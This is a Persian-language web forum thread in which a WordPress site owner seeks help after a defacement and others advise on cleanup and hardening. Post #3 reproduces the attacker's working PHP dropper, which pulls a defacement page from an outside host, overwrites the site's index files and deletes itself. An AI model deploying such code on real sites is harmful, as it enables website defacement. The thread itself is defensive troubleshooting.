هک شدن سایت
#1
Note 
سلام
من امروز به سایتم رفتم دیدم زد:

Hacked by 

فقط دیفیس شده بود و منم فایل index.php ـه وردپرس رو از اول آپلود کردم و درست و یوزرنیم و پسورد هم درست(عوض) کردم.
پرمیشن این فایل رو هم کردم 444

من از هک و اینجور چیزا سر در نمیارم، آیا کسی هست که بتونه سایتم رو اسکن کنه و باگها رو شناسی کنه و بگه که چطوری برطرفشون کنم؟

اینم آدرس :


ممنون میشم کمک کنید

آخرین ویرایش: 28-10-2014 ساعت 22:24، توسط The Arrow
See your dreams every where  and every time , try to remember your dreams because a man lives with his dreams forever
پاسخ
#2
یعنی محتویات index.php رو تغییر داده بود دیگه؟
خود وردپرس که باگ شناخته شده نداره شاید قالبت باگ امنیتی داشته باشه که احتمالش کمه
کل وردپرس رو بجز فایلهای اپلود و... از اول آپلود کن احتمال داره جایی shell گذاشته باشه. وقتی یه فایل رو تونسته تغییر بده یا توسط shell اینکارو انجام داده یا پسورد  نرم افزار مدیریت هاست(مثلا سی پنل) رو داشته که این خیلی خطرناکه مطمئنی پسورد رو لو ندادی؟
هاست از کجا گرفتی؟ Cpanel داری؟ اگر داری یه ویروس اسکن بزن

آخرین ویرایش: 28-10-2014 ساعت 17:39، توسط PHP.sec
پاسخ
#3
پرمیشن مگه نباید 644 باشه؟ چون بود بعد من فایل index.php رو 444 کردم

الان دوباره رفتم تو سایت دیدم زده:
کد:
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING in /home/ramtinak/public_html/wp-content/themes/ramtin-theme/index.php on line 2

اینبار انگار تم رو دستکاری کرده.
فایل index.php رو اینجوری کرده :
کد:
<?php
$def = file_get_contents(\'http://zonehmirrors.net/defaced/2013/01/13/baltstudio.lt/index.html\');
$p = explode(\'public_html\',dirname(__FILE__));
$p = $p[0].\'public_html\';
if ($handle = opendir($p)) {
    $fp1 = @fopen($p.\'/index.html\',\'w \');
    @fwrite($fp1, $def);
    $fp1 = @fopen($p.\'/index.php\',\'w \');
    @fwrite($fp1, $def);
    $fp1 = @fopen($p.\'/index.htm\',\'w \');
    @fwrite($fp1, $def);
    echo \'Done\';
}
closedir($handle);
unlink(__FILE__);
?>
وقتی لینکی که توی این گذاشته رو باز کردم، انگار یکی دیگه ـست که دستکاری کرده!
دوباره این قسمت رو آپلود کردم، پرمیشن این هم کردم 444 
راستی ظهر رمز و پسورد اکانتم توی سایت هم عوض شده بود که از دیتابیس تغییر دادم
اگه اشتباه نکنم توی وردپرس فقط میشه از دیتابیس یوزر لوگین رو عوض کرد

چطوری اینکار رو کرده؟
و اینکه دوباره عوض شده!
[تصویر:  20141028-511-Capture2.png]

راستی همین الان هاست،ایمیل و.. هم اسکن کردم یکی پیدا شد:
[تصویر:  20141028-574-Capture.png]
هاست رو از آذرآنلاین گرفتم:

فقط چندباری رمز هاست رو بهشون دادم چون چندتا مشکل داشت حلش کردن
اما هربار قبل از رمز دادن اول اون رو میزاشتم رمز اولیه و به اونها میدادم، وقتی کارشون تموم میشد هم رمزمو عوض میکردم.

هاست سی پنل این سایت هم جوریه که توی هاست فقط یک یوزر میشه ساخت.


یعنی میگی از اول  وردپرس رو نصب کنم؟ اگه آره من بلد نیستم چطوری باید اطلاعات قبل رو برگردونم

آخرین ویرایش: 28-10-2014 ساعت 21:19، توسط The Arrow
See your dreams every where  and every time , try to remember your dreams because a man lives with his dreams forever
پاسخ
#4
درسته شل آپلود گرده اونی که انتی ویروست گرفته همون شله پاکش کن
پسورد سی پنل رو عوض کن/ پسورد دیتابیس رو عوض کن
همه پلاگینهای وردپرس رو موقتا غیر فعال کن

احتمال داره سایت تو مشکلی نداشته باشه
این هکرها میان با استفاده از باگی که یکی از سایتهای روی سرور هست از اون دسترسی میگیرن بعد از اونجا میان سایت تورو میزنن! البته این احتماله! شاید سایت خودت باگ داشته یا پسوردت رو لو دادی یا دزدیدن Big Grin

آخرین ویرایش: 28-10-2014 ساعت 21:34، توسط PHP.sec
پاسخ
#5
کارهایی که گفتید رو انجام دادم
من کلا دوتا افزونه نصب کرده بودم
یکی Crayon syntex highliter بود اون یکی هم از قبل روی وردپرس بود(افزونه وردپرس فارسی)

و اینکه بعد از پاک کردن شل، این سنتکس هایلایتر هم توی لیست افزونه ها نبود منم رفتم تو هاست و به کل پاکش کردم.

من تم رو از یه سایت خارجی دانلود کرده بودم و تنها کاری که کردم ترجمه ی اون بود.
شایدم یه جاییش رو خراب کاری کردم!
فقط یه چیزی،چندروزی پهنای باند سایتم تموم شده بود، تا قبل از اینکه پهنای باند سایت تمومبشه این مشکلات نبود، بعد از اینکه تموم شد و من طرح سایتم رو بالاتر بردم
رمز وردپرس عوض شده بود و اینکه رمز هاست هم به حالت اولیه برگشته بود(رمزی که آذرآنلاین داده بود).(فکر کنم تغییر رمز هاست واسه این بوده که من تعرفه ی هاستم رو عوض کرده بودم، بوده) 

در کل خیلی خیلی خیلی خیلی ممنون

آخرین ویرایش: 28-10-2014 ساعت 22:11، توسط The Arrow
See your dreams every where  and every time , try to remember your dreams because a man lives with his dreams forever
پاسخ
#6
سلام
یکسری کارهای عمومی برای جلوگیری از لو رفتن پسورده که باید انجام بدید مثلا همیشه از Onscreen keyboard استفاده کنید(بهتر اینه که نیمی از پسورد رو با کیبورد و نیمی رو با Onscreen keyboard تایپ کنید) و تا زمانی که تو کنترل پنلتون وارد شدید دیگه تو اون مرورگر هیچ سایتی رو باز نکنید.
این راه ها برای جلوگیری از لو رفتن پسورده اما منم فکر میکنم از سایتهای روی سرور خوردی.
پسورد دیتابیس تو فایل config ذخیره میشه که این فایل رو باید بصورت رمز دربیاری تا هکر نتونه براحتی پسورد دیتابیست رو پیدا کنه.

مردم دنیا 10 دسته هستند: کسانی که باینری میفهمند و کسانی که باینری نمیفهمند !
پاسخ
#7
ممنون
چطوری باید فایل config رو به صورت رمز در بیارم؟

See your dreams every where  and every time , try to remember your dreams because a man lives with his dreams forever
پاسخ
#8
یکی از اشتباهاتی که انجام دادی این بود که پلاگین رو از یه سایت غیر از خود وردپرس دانلود کردی. خود وردپرس این امکان رو داره که از داخل داشبورد افزونه نصب کنی.
برای Protect کردن فایل کانفیگ(wp-config) میتونی از نرم افزار های Obfuscator استفاده کنی مثل این:
بعلاوه حتما کنار فایل wp-config که تو روت هست یه فایل htaccess. درست کن و این محتویات رو توش بذار یا اگر وجود داره به آخرش اضافه کن:

کد:
<files wp-config.php>
order allow,deny
deny from all
</files>

برای اینکه ببینی درست انجام دادی بعد از مراحل بالا برو به این آدرس ببین باید پیام Access forbidden! بیاد.

کد:
http://youSite.ir/wp-config.php

این کد رو هم به اخر فایل wp-config.php اضافه کن:

کد:
define('DISALLOW_FILE_EDIT',true);

آخرین ویرایش: 29-10-2014 ساعت 11:26، توسط PHP.sec
پاسخ
#9
کلیدهای امنیتی رو که تو wp-config هستن عوض کن
میتونی از اینجا یه کلید تصادفی بگیری
مثلا:
کد php:
define('AUTH_KEY'        'NW,VnbM-V|?Uq]`F3}h;7xE+k-x++8Q7@U)Et+^{n+b{Ry%N8IvU|y/43Mq0SZr4');
define('SECURE_AUTH_KEY' '.*_S%udC{R+wQtX)=/h2-i~VyEqlL-+;-Y.]jq:#Eq~+mhRi9ODuEk7%xUiy;)ld');
define('LOGGED_IN_KEY'   'vLt7ldlVbmx#j]Kez2lF(P&(T)v7MhnF3,Rv$R,,g=_c-3j6xx_GK<)+^JUwuIy)');
define('NONCE_KEY'       'qxYKP(Lwm3tQUm|2~+3X^6o,<y?J|lt-$5H|mp.;M6`)7LW$<-+j0aa)I=6qY*><');
define('AUTH_SALT'       'Qa[>~s8gtU^kdP_%O5+H>=|Z?iM++/UP_H2eBm4g%Uy909fWH DG$=rN!]WARu#h');
define('SECURE_AUTH_SALT''Z,qy$/[T+K9]t6<p1R?e|-Fp$I$xi|)(gCxi2aR^c>$a8A#C+ayfg><7?<vl?ly;');
define('LOGGED_IN_SALT'  '`X2:RofW|#~,Bd5!V:e2dW`m1KdO&QkKj(@J5k;_jy%=J1ItK@;ti8mynJSk}gCG');
define('NONCE_SALT'      'fAs-A9I3-Jl{7n^x`i~$Pto|Oj-F1L!(8bVq~_v&fK9sfO~x`9$+!^8:vc|]$2m/'); 

پاسخ
#10
من افزونه رو از تو خودِ وردپرس نصب کردم، تم رو از وردپرس نگرفته بودم
تمام کارهایی که گفتید رو انجام دادم. وقتی محافظت شد، این تکه کد توی فایل کانفیگ عوض شده بود:
کد:
$table_prefix  = 'wp_';

اینجوری:
کد:
$Vky1tkljcash  = 'wp_';
که دیگه میخواست یک راست وردپرس رو راه اندازه کنه که هی میزد Table ـه موردنظر وجود ندارد
که منم کردمش همون اولی.

راجع به htaccess هم نزد Access forbidden! زد "صفحه ی مورد نظر پیدا نشد"
اما قبل از اضافه کردن کد به htaccess وقتی به آدرس کانفیگ میرفتم یک صفحه ی سفیدی میاورد.
الآن هیچ مشکلی وجود نداره
ممنونم

See your dreams every where  and every time , try to remember your dreams because a man lives with his dreams forever
پاسخ
ایجاد موضوع جدید   پاسخ به موضوع  

موضوعات مرتبط با این موضوع...
موضوع نویسنده پاسخ بازدید آخرین ارسال
Note سوال گرفتن مقادیر مورد نیاز آنلاین شدن در وبسایت ها The Arrow 3 1,073 29-01-2015 ساعت 16:31
آخرین ارسال: C0der
Note متن کپی رایت جدید!! SAMAN ELITE 6 1,924 25-01-2015 ساعت 14:54
آخرین ارسال: BaNNer LorD
Note سوال انتقال سایت به آدرس جدید The Arrow 4 1,083 21-12-2014 ساعت 17:10
آخرین ارسال: The Arrow
Note مشکل فونت سایت The Arrow 6 1,114 31-10-2014 ساعت 21:45
آخرین ارسال: SOFTAFZAR
Note رعایت نکردن کپی رایت از نظر شرعی VBProgrammer 5 1,052 21-08-2014 ساعت 18:33
آخرین ارسال: OnLine
Note اضافه کردن www به آدرس سایت saeed-70 3 619 08-08-2014 ساعت 13:13
آخرین ارسال: Stack OverFlow
Note ساخت وبسایت - خرید هاست The Arrow 1 501 11-04-2014 ساعت 18:49
آخرین ارسال: Ali Developer
Note 6 وب سایت در زمینه یادگیری زبانهای برنامه نویسی THE KNIGHT 0 408 18-02-2014 ساعت 16:20
آخرین ارسال: THE KNIGHT
Note آموزش:: دریافت اخرین ارسالهای سافت افزار بدون مراجعه به سایت Stack OverFlow 1 570 12-02-2014 ساعت 16:28
آخرین ارسال: Babak98
Note سایت دانلود درایور فارسی mela1 1 481 01-02-2014 ساعت 18:59
آخرین ارسال: Daniel

کاربرانِ درحال بازدید از این موضوع:   1 مهمان